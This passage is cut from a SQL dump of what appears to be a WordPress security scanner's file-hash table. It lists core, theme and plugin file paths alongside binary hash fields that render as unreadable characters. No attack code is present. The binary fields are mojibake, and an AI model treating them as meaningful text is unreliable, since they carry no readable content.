t','',0,'?'),('�\0��%3[$x\0��.��(','wp-admin/images/marker.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�*O2/�3I2���','~T�@\\��vUI<�pK����a`T�@c��ca�','',0,'?'),('���4�����=��','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʖ�Ѵ��~f���i�','�ߩ0�ԍ���Ѧ�ƻH\n�����¡;�','',0,'?'),('� ���Em[�����l�<','wp-includes/js/tinymce/plugins/image/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��ZC�l}�莐�','y��T��Nz+������\'��%Y�','',0,'?'),('�h��\r����\Zc�n&','wp-includes/wp-includes/Requests/SSL.php',0,'��K��������','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('�m���$V4/���','wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js',0,'����6�l�UOaD�Q�','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('�;k���j���f@g\r<','wp-content/themes/hueman/assets/front/img/demo/2-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','];�����wq�.P��','{�}����-�L0}�^��}P��9��(f��','',0,'?'),('�D`B�ȥ�\n�b�Ǚ','wp-content/themes/twentynineteen/sass/_normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ut _��vO0a','LL�Z�m��h2-s��,+�<�s!@tp�z�G','',0,'?'),('�MQ��HY�_r$K�S�','wp-content/themes/twentytwenty/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�8\\O��^����QR','����@8\Z���!��G�6��ͮe���,\0�5','',0,'?'),('�OT��ɛ�w���:�F','wp-includes/wp-includes/js/media-editor.js',0,'��@4Va�ˣ������','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�U�.���\nelG��\n','wp-content/themes/hueman/functions/czr/controls/class-base-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�@��#�0���E��̚','���Ld�\r�]���\0X������|����dN','',0,'?'),('�gJ����Ol���Ӗ^h','wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{4T �:��?�','\nɹ��u8�Ӕ����{�L^�ߠ���>�c�','',0,'?'),('�pO�J�F�`�f��','wp-content/themes/promote/inc/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':X@P�rK\Zh��3=e_','5K�X���gٱ�#$W���p+D����','',0,'?'),('�y��^��)�k�l','wp-includes/wp-includes/widgets/class-wp-widget-links.php',0,'�x�/k�h\n��ֽ[Nv ','�x�/k�h\n��ֽ[Nv ','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('��%*����|0����','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-date-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݫ$�\r:��](2\\X~W','ч�n���s��Mӥ�&@KC���/6���zEd�','',0,'?'),('����V�j�D���','wp-content/themes/hueman/assets/czr/css/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('���k�+V ^�h��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-checkbox-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/��\\u�X|�Y���Ŧ','�S\\�R���+@<[��yW���U@�G+����','',0,'?'),('��V��_�>�y���\Z','wp-content/themes/newsmag/assets/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�24\rPT�\0�RA9�','��6���uʘ̭�*���[�w*���y��a','',0,'?'),('��W��Q��i�b#��\\','wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css',0,'�%/NqOR�g��+\\�','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('��{�]\\ֵ� ��d��','wp-admin/css/forms-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՒMwG��2�x͝','ݗ��|\0�[����1��1n|�m�©�O� ','',0,'?'),('����Ljt�r�(�̰�','wp-content/themes/sg-window/genericons/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&tw�4�Љ�pc�$','���;��=LV|,8�Tg0W�N�QA@kC@���','',0,'?'),('�\03�W�\'�N���|','wp-content/themes/newsmag/inc/customizer/settings/general/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�7�)�G)+du�W','g�ㅠ{\0�Ӫ�/T��T_�EHh�p�pY�','',0,'?'),('�&Z�H��A�-��','wp-content/themes/capacious/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�S���B�%�\"�','�;U��6@��]jj�m�D��%��5��8c\'6�','',0,'?'),('�������\"�R�Ŝ','wp-includes/images/crystal/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�#bP���a���14�lZ','wp-includes/wp-includes/class-wp-http-proxy.php',0,'@U,�:��-<I�e��','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('�%����e�h�+s','wp-content/themes/gambit/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x2�׳ΰ�b)�W+�','�g�����F��P��ٹV/�k헆mV�8�','',0,'?'),('�%�?������w,�','wp-content/themes/advance/inc/kirki/includes/class-kirki-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�8����G','-�1\"����Cg��>��O �}�q�ŭ�?���','',0,'?'),('�%��+~���R1��҉','wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�I��W�^2�T�3%�','wp-content/themes/spidermag/spidermag/spidermag-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�X4�8cG�a[�5C*','�-�,ڧ!!}�_��Br�t��#d�Pfϯs�,r','',0,'?'),('�]u�������3�','wp-content/themes/travel-stories/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�|�uI�A��\r�J','������w��o_w�O�\Z���9��\Z�̹�','',0,'?'),('�h�$��T��G���P�','wp-content/themes/sg-window/content-page-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xF��~�|���','_�\ro�K�{���\0H��V.|��!w�.��','',0,'?'),('�v%���S�[�̪�Ѿ','wp-includes/ms-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\n����[�|�J/�','�8f�٣���<}.Q��������','',0,'?'),('��~C�>��xh��\r','wp-content/plugins/wp-cerber/assets/flags/bh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx\n=CS\Z�f��PF|','(���=AEhe�SJ駄�_�Ve2Z�E��&j�','',0,'?'),('������W�Q��ʠ\Z�','wp-includes/wp-includes/js/dist/compose.js',0,'R6�\\J��\"5r���','R6�\\J��\"5r���','h��l�2������<��_9��x����C�ҏ','',0,'?'),('���|X%jgu@�CJ�M','wp-includes/js/dist/vendor/react.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('����O��Z)��','wp-includes/wp-includes/SimplePie/Cache.php',0,' ��~ܯ{ʹ���+h�',' ��~ܯ{ʹ���+h�','�md�����n�nun�pU0 l��6���Zi�R','',0,'?'),('��i���<���?�?m�','wp-includes/wp-includes/css/buttons-rtl.min.css',0,'F��X�WDw����ڭ�','F��X�WDw����ڭ�','�o� ������!Pc�����\0�i�F9aK����','',0,'?'),('�ϖm K��Z���,�7�','wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fu� ��(C)R�1��Z�','�*��J��+����D5��8���N�Yxn','',0,'?'),('�ւxRa��ǜ�@','wp-includes/css/dist/editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('���X\"�-{��$48sx','wp-admin/css/deprecated-media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k+�H�h����3','�ؖ)_��6h����1��A\\�_lgK�d�kUX�q','',0,'?'),('��42���i�[�O��','wp-content/plugins/wp-cerber/assets/flags/tf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�``�O��.�˛�','��������r��4�&,lb�Fr~�T<���阈�','',0,'?'),('��Ud��M���S$�l','wp-admin/includes/class-wp-list-table-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�>\r_D\"��Ck��C','\\�;��]\"���(+/��}�˚q5��NS\'�','',0,'?'),('�����gy_Ɣ�eb\r','wp-content/themes/newsmag/inc/components/breadcrumbs/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\0���O��b5o�','wp-content/plugins/wp-cerber/assets/flags/ir.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dV�M�t^,��7�xD','i��֚b5�J��?]����+��H�r8��','',0,'?'),('�\rz��@�_Ð�m�dM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�96�f����;���0','mgc%�i\Zn�A��B�@��wF�z�;�y`\rN','',0,'?'),('��H3ʦq6dȣ�','wp-content/themes/spidermag/spidermag/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��Τr�C�֥�Q�','�u>(�yE�-J�����Ls�ܳ`���o�','',0,'?'),('�8r�l6� 6.,�','wp-content/themes/kidzoo-lite/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T��e��W����','&4\\lw�\0�j�D�n���zVMG\0������','',0,'?'),('�8�FM-<8~����<�','wp-includes/wp-includes/images/arrow-pointer-blue-2x.png',0,'%m�rތ]4�9c�','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('�@G��t�eY�\\\'>�O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�]Tg���\Z�!��','�m1�X^��s$� Eh��M���WR�{��^�','',0,'?'),('�E`�U�W�����Su','wp-content/themes/pine/img/icons/dropdown-ico.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[�g��/�ў���s','Ψ������1���\nY�wT�f�_ixbm�c','',0,'?'),('�G|�˭�_�)��6oU','wp-content/themes/maxbusiness/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĕeHix[��`!f�J�','����}��˹t$��)�ʦ��P��1��~܀��','',0,'?'),('�O~�LȦ�\"f~|��;','wp-content/themes/twentynineteen/sass/site/header/_site-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_���n.�)�U\\!k�','1,����0��љLv��/\r�>%���\"����','',0,'?'),('�Z��Wt�p�N�h','wp-admin/css/nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��\'�]9?�]g�$','���P�a���̬Vch�;������;l','',0,'?'),('����Ȯr��&x�q�','wp-content/plugins/wp-cerber/assets/flags/fi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ќ0C��e���#��','�r\r=O�֓bt����:ٚU$R?�}�t��','',0,'?'),('��Z ��Og\nW�W�2','wp-includes/js/wp-embed-template.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('��o��8s�P�9b','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z$���m$�,7^�a','��2dٓ�qѾQ0Xb��$�Ƴ5#��z��`','',0,'?'),('��!�h>�iq�8t��n','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��>��@Ue��U','�țp���˄o<��O\n��Oo{�w=�S','',0,'?'),('���\\��9�ѕ�F�w�','wp-admin/js/revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L��Oez���nUR','�q��:\\��H�-��ƒ�V��i���ԍ�$','',0,'?'),('��JK��M�0C�QW','wp-content/themes/kidzoo-lite/sass/base/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u������N�-�q','I@{M)e楤rI�\Zi��5��m:laA�8�y�','',0,'?'),('�� |������Y�=','wp-content/themes/newsmag/assets/sass/layout/_body.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���C��A�����0�','�iB��5��A?�����f�P��Qwc�#��&','',0,'?'),('��#��eM�(DZ߽��','wp-content/themes/sg-window/img/icons/friendfeed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nv�]���g8��}� ','̳J&j����q��Se?��l7�\\\\�','',0,'?'),('��Y#�� IŖue���','wp-includes/wp-includes/SimplePie/Category.php',0,'{���[�� �ZVG�4&','{���[�� �ZVG�4&','�<��J�H�v�i� b�4l~�e�F��mj�','',0,'?'),('���%�!ڡG��&�5','wp-content/themes/twentytwenty/assets/css/editor-style-block.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ ,�R��','�j^V�:���M�䌚�0o7Y|R9߀a|��� ','',0,'?'),('�����Ly��RB�9�k','wp-content/plugins/wp-cerber/assets/flags/mh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�\0oէ��3ˠ','�ܰ�\n\0�\'6G�R���ZH-�`��Ș�� ','',0,'?'),('����w�u⼶�i��I','wp-content/themes/hueman/assets/czr/css/customizer-czr-content-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D)�j�ڒ��1Xj�:��','c�쐦.�ɗƁ!��ζ�`+�e��>K��)�','',0,'?'),('�\r��B]�e�Od�J','wp-content/themes/Endolf/404.php',0,'�Ʉ��������Û+','�Ʉ��������Û+','dܟ��eb�\Z��\r_*m��V0oB�q<���V�','',0,'?'),('� 7��S�Y�D��`��','wp-content/themes/advance/inc/kirki/assets/images/kirki-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�xz�r��rp�f��4b','{4� �\"- v]�F���*Ş( <�ߔh�É>','',0,'?'),('�%���_���Hs��\n','wp-includes/wp-includes/images/icon-pointer-flag.png',0,'��,���E^�j`\'','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�(Oد���~�m}��%','wp-includes/wp-includes/css/wp-pointer.css',0,'HB���v��}�d~�','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('�/=�+HhE��14�ʆ�','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[QTGfS\"�����','�4���4HGM�;]B���FO��d�ƴ6@�','',0,'?'),('�GR�������m)','wp-content/plugins/wp-cerber/assets/flags/kg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8]�/E0%�gQյQ�','�3$��f�Rx)��@\\�e.3\Z�Ω�\r`p�Y','',0,'?'),('�O�CGҧ�+>��^��','wp-content/themes/advance/inc/kirki/assets/scss/controls/radio.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9z˃6�IO�ܕ�;�','K��_TJ؟lj[�C屋xE��>[`�^�','',0,'?'),('�l���M+J��m��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�\'���\'�Q^�o�+^','!3��`DTd�k����3���Z�2�6�}','',0,'?'),('�u��и�;����]!6)','wp-includes/wp-includes/js/dist/is-shallow-equal.min.js',0,'`�Y��5n��Y�2-�','`�Y��5n��Y�2-�','��Q�f�1��)ۡV�G�y�8�V�d���%','',0,'?'),('�u������%�(��','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�ƣٿc;���z���','��N�J�s�@�3 �:h)�7K�<�\\N�+','',0,'?'),('����N���@�(�3�','wp-includes/ID3/module.audio.mp3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O:B\0�z�6x`B','� ]���� \0On��6B;���\ZZ$� 2ЯSh','',0,'?'),('��h���)UG@�x��v ','wp-admin/edit-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�8���K��PH�>H','��j\r�+Yg��1��S����t2�f��;�','',0,'?'),('���x�C�\"�af��`','wp-content/themes/storeone/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̼ټj�+�M�>\\�','�4V�x�\\A-����٢\n�2��b*��D�-','',0,'?'),('��/�����N.&R�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',0,'�N���>�EH�I��� �','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('��X��w��E��','wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�ݜ����_ť;k)M','�6��6Pa����D���@���f6�{��','',0,'?'),('���No}@+;�E3^','wp-content/themes/spidermag/assets/library/enquire/js/enquire.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�C%E���>Q��','YQ��p�S0cB�\Zۋ��K�lr���5����','',0,'?'),('�������k�X�TrD�','wp-content/themes/spidermag/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tv��ݐ�m','GN�0( �֊ec��3�_5��eN[O����','',0,'?'),('��x��\'�*+��wn��','wp-content/themes/hueman/parts/post-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�㾔S��c@\"��L��','AhK�|)<5|�M�f��8{ju(���5�Y','',0,'?'),('��or�������籽�','wp-content/plugins/wp-cerber/assets/flags/bq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('����|��g!��a�h','wp-content/themes/kidzoo-lite/sidebar-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�N��/&�E�ʗ��','vRn9���Š����&���c�\0:U��4�b�','',0,'?'),('��2]hqu:�T6E�U�','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[DW\01f�!�`ߜ�','����Ld+,\rO�V���UNxea9̽�+O�C1�','',0,'?'),('���/����O���k','wp-content/themes/Endolf/archive.php',0,'���5Mk��K�u��}�','���5Mk��K�u��}�','N��\Z]F�(>L�(���`\rQD?�3�����','',0,'?'),('�\r[�8�)�r�}8e','wp-content/plugins/wp-cerber/assets/flags/sz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']{W���:��(�Բ�','PJU����I\"�,�����uVo��ƞ�dQ*z','',0,'?'),('� Ie�ԩ[G���_�6','wp-includes/js/dist/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������Ƒ�~d','�$O`��1��\\��\Z�p���۳�wR��L}�e?','',0,'?'),('���lB�לb����','wp-content/themes/newsmag/assets/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!;��R�j�Q�/���C|','��roB���r�s��Ĭ��h\Z�i�j�SY�','',0,'?'),('� 4\\~��2��ࢨ�','wp-content/themes/anima/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ր�����ޜn��p','Ț��.���s��B.H�r2�;o��`�J?�L','',0,'?'),('�#�AuI.F��/���','wp-includes/js/wp-pointer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('�,.��<��@�G��','wp-includes/wp-includes/js/jquery/ui/effect-size.min.js',0,'�t(������D','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�@��,�n\\���+k�','wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('�C��ݑ��=w%8P�','wp-includes/wp-includes/js/dist/reusable-blocks.js',0,'^�ގ�g��Ts؉f�','^�ގ�g��Ts؉f�','zt\r��j�Z\Z��H�ͼċ�!f����;��','',0,'?'),('�H�G��H�3\'�6�','wp-content/themes/anima/admin/demo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ew�9M����D�͞P','�x�l\Z�N��!u��7���v���m~�2X�I>�','',0,'?'),('�O/�ì�`|g�_\0','wp-includes/Requests/Exception/HTTP/429.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��%|F.àZd����','��!�T��uwm�t5�o\n�2A\"k�ߚz�','',0,'?'),('�SRý+���UE�s>�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[���\nSO2}','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('�Z��S=�\0����v�H','wp-content/plugins/wp-cerber/assets/flags/er.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�Ք#ӕ��?.O�]��','��\0�D?J1�nd�&�%��6\"ᅃ�.��� ','',0,'?'),('�v��O蒗v�����','wp-content/themes/sg-window/img/icons/tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�Y��v$ |�r�E','6��\0(�N)g�\"���5���)ՀL�ߗ','',0,'?'),('�v�FI��2h���n�','wp-content/plugins/wordfence/readme.txt',0,'��R���ݯ6��','��R���ݯ6��','z�O҈|�AL?�n�X>��lKt:%��6','',0,'?'),('�{�1�\"��^���.','wp-includes/class-wp-widget-factory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('����!K% ��','wp-content/themes/spidermag/assets/images/preloader/setting.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��#nd�N�n�?','~�\0�eV��Nw�-\Zz�< W��HgT\0�/����','',0,'?'),('���s��������v ','wp-includes/blocks/social-links/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<{�Vg3B+z�B��','�I�W�}��Ogzˀ ��h��-��wl','',0,'?'),('��s��I�qF�����','wp-admin/includes/class-theme-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\P\0������E�é��','T���V/@cB����Վ�o��0`��f_���','',0,'?'),('���=V;�����N.K','wp-includes/js/wp-list-revisions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PbOP�xO�rs7��2','�#��;w�1���.��B���3�f_;�Pf�','',0,'?'),('��K� �l7S��','wp-content/themes/storeone/css/media-screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�h�h�+:bm����','9���l���\Z�+m*�hlv�ٞ\n~���@�� ','',0,'?'),('�����h��١k�','wp-content/plugins/wp-cerber/assets/fb2b.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}d��ΰ��R͵�','Ky�Y �O~�vx�W�� �<3����PZPZ','',0,'?'),('����7OPs�Ωp��W','wp-content/plugins/wp-cerber/assets/multi/multi.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P?�� a��80�$','*}�AB�/�*o%���;���5��k��;�3','',0,'?'),('��\n�ӛIQED ��','wp-includes/class-wp-comment-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\�M�M�F/�I','wp-includes/Requests/Auth/Basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��x̄� 4U� k!C','.�йh�dBiHɀ�n�s�����\\���O','',0,'?'),('����V��D9�&A','wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-sanitization.php',0,'j[�n*�o�\\�','j[�n*�o�\\�','_�~QJ��vp~�zA0LW���N��·��x','',0,'?'),('��nξ8n��Pp\\`z','wp-content/themes/twentytwentyone/assets/css/ie-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��Fڭ��G��','?���O//��%�N�W0�㍕�M4\'�3�F���','',0,'?'),('���s�3r���F�','wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css',0,'���\\��B���&�pw�','���\\��B���&�pw�','7>xV&v|��U�& ݷ\"ǥz9j�F%ѽK��V','',0,'?'),('��Κ,�Q�a�gl��\Z�','wp-includes/class-smtp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ���� +\'8k_','',0,'?'),('��s��,��j�j3','wp-content/plugins/wp-cerber/assets/flags/gg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��L\Z��|�=�c��','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0�����ou��̌�','����7/Q���ƐՐw�g:�?��#{s��ɟ�','',0,'?'),('��`j���D��.�I','wp-content/themes/sg-window/img/icons/small/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڌ\0�U��aY�h4N̖�','9���}+�@\r�ȹz�cP-�R��z!�A@�X�','',0,'?'),('��dA#���*�Źo7','wp-admin/js/customize-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�$�����a�F','{��f[�����;�\"�h�]]u��3 �_�oQ�\Zu','',0,'?'),('�3=^��7�P�RA','wp-content/plugins/wp-cerber/assets/flags/sr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NT��I`$�x�\"v','�J!�^�α}���ݓ$�R�M~i���c���P','',0,'?'),('�B,B��>I U �','wp-content/themes/auberge/assets/js/vendor/imagesloaded.pkgd.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�8�_ÌOl�7��7�','b�\Z�/;$+���]�⸫X��ZN�����f�','',0,'?'),('��V\ZF��\0���|�','wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Bg�EJ�ƽH�','i��|\\I����E����_��X綈j��','',0,'?'),('���x�OW\r�����','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ئT�Ь�Ԅc�/��','TJ�)�,8�q�@�f�<Dڛ��\rx����F�','',0,'?'),('�1I[t��T�ڐ�y','wp-content/themes/newsmag/inc/admin/welcome-screen/sections/actions-required.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�X�ѷdP{���','H���p*ݙ���_z Iyp(/_�{��ZI\"ָ','',0,'?'),('�5ڜ���2�l2{�','wp-admin/js/widgets/media-video-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�ܥ��d|Q�S�n�','��R;T��wh��m^�����䜺��K�L�A','',0,'?'),('�8�Ö��z��ϣ�0��','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php',0,'�0���s0C{[��[t7','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�D��!VD+����','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�V��� �9�J�','փ��hbf��#��Ђ��OE��R���9H\r','',0,'?'),('�M�/<�P�ߍ�f.��','wp-includes/js/jquery/ui/effect-bounce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;B� ��GYQ�n�ߴ','���m/�g|ڶ\\���e(�>6��\n�-G!�\0','',0,'?'),('�T�:\Z����rD�� 